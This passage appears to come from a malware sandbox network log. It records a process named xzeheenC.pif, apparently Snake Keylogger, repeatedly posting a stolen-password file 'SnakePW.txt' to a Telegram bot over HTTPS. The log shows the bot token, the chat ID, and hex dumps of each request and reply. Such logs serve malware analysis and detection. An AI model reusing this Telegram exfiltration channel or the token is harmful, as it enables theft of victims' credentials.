                                                                                                                      41192.168.2.549944149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:05 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21b3074f62f3
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:05 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 62 33 30 37 34 66 36 32 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21b3074f62f3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:05 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:05 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:05 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418889,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535085,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      42192.168.2.549949149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:06 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20ed9b305c5d
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:06 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 65 64 39 62 33 30 35 63 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20ed9b305c5dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:07 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:07 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:07 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418892,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535087,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      43192.168.2.549950149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:06 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd210716015f06
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:06 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 30 37 31 36 30 31 35 66 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd210716015f06Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:07 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:07 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:07 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418894,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535087,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      44192.168.2.549952149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:06 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21d585647a82
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:06 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 64 35 38 35 36 34 37 61 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21d585647a82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:07 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:07 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:07 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418895,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535087,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      45192.168.2.549958149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:09 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd210a7f89af93
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:09 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 30 61 37 66 38 39 61 66 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd210a7f89af93Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:09 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:09 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:09 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418897,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535089,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      46192.168.2.549959149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:09 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2125107c93fb
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:09 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 32 35 31 30 37 63 39 33 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2125107c93fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:09 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:09 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:09 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418898,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535089,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      47192.168.2.549960149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:09 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21fe3ea779ee
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:09 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 66 65 33 65 61 37 37 39 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21fe3ea779eeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:09 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:09 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:09 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 39 2c 22 64 6f 63 75 6d 65 6e
